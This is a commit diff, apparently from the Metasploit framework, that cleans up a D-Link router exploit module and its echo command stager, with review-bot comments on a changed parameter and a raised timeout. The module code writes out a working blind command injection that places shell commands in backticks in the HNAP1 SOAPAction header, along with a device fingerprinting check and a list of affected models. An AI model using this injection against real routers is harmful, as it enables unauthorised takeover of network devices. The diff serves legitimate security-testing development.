Do code cleanup

bug/bundler_fix
jvazquez-r7 2015-05-29 14:45:47 -05:00
parent 666b0bc34a
commit 8b2e49eabc
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
2 changed files with 19 additions and 22 deletions


@ -26,11 +26,10 @@ class CmdStagerEcho < CmdStagerBase
# and initialize opts[:enc_format].
#
def generate(opts = {})
if opts[:temp] == false
opts[:temp] = ''
else
opts[:temp] = opts[:temp] || '/tmp/'
opts[:temp].gsub!(/\\/, "/")
opts[:temp] = opts[:temp] || '/tmp/'
unless opts[:temp].empty?
opts[:temp].gsub!(/\\/, '/')
opts[:temp] = opts[:temp].shellescape
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
end
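Review bot: Callers that still pass `:temp => false` no longer get an empty prefix, because with the `== false` branch removed `opts[:temp] || '/tmp/'` turns `false` into `'/tmp/'` and only `''` now means "no temp directory". This commit updates the one caller visible here (the D-Link module); whether other callers pass `false` cannot be seen from this page. Either keep a compatibility line ahead of the default, `opts[:temp] = '' if opts[:temp] == false`, or state the new contract in the method comment, e.g. `# opts[:temp]: directory prefix; '' disables it, nil defaults to '/tmp/'`. The body of `generate` continues past the end of this hunk.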


@ -18,9 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote
Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
interface. Since it is a blind OS command injection vulnerability, there is no
output for the executed command. This module has been tested on a DIR-645 device.
The following devices are also reported as affected:
DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB
DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
},
'Author' =>
[
@ -36,21 +36,19 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DisclosureDate' => 'Feb 13 2015',
'Privileged' => true,
'Platform' => 'unix',
'Platform' => 'linux',
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
],
]
],
'DefaultTarget' => 0
))
@ -60,16 +58,17 @@ class Metasploit3 < Msf::Exploit::Remote
def check
uri = '/HNAP1/'
soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings"
soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' => {
'SOAPAction' => soapaction,
},
'SOAPAction' => soap_action,
}
})
if res && [200].include?(res.code) && res.body =~ /D-Link/
return Exploit::CheckCode::Detected
end
@ -92,26 +91,25 @@ class Metasploit3 < Msf::Exploit::Remote
execute_cmdstager(
:flavor => :echo,
:linemax => 200,
:temp => false
:temp => ''
)
end
def execute_command(cmd, opts)
uri = '/HNAP1/'
cmd_new = "cd && cd tmp && export PATH=$PATH:. && " << cmd
soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' => {
'SOAPAction' => soapaction,
},
},1)
'SOAPAction' => soap_action,
}
}, 3)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
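Review bot: In `execute_command` the second argument to `send_request_cgi` goes from `1` to `3` with no comment, so a behaviour change rides in on a commit titled as cleanup, and the bare literal leaves the reader to work out that it is the response timeout in seconds. This reading assumes the page prints the old line before the new one, as the other changed pairs suggest. A trailing comment would record the intent, e.g. `}, 3) # response timeout in seconds; raised from 1`, and the commit message should mention the change. The method's closing `end` lies outside this hunk.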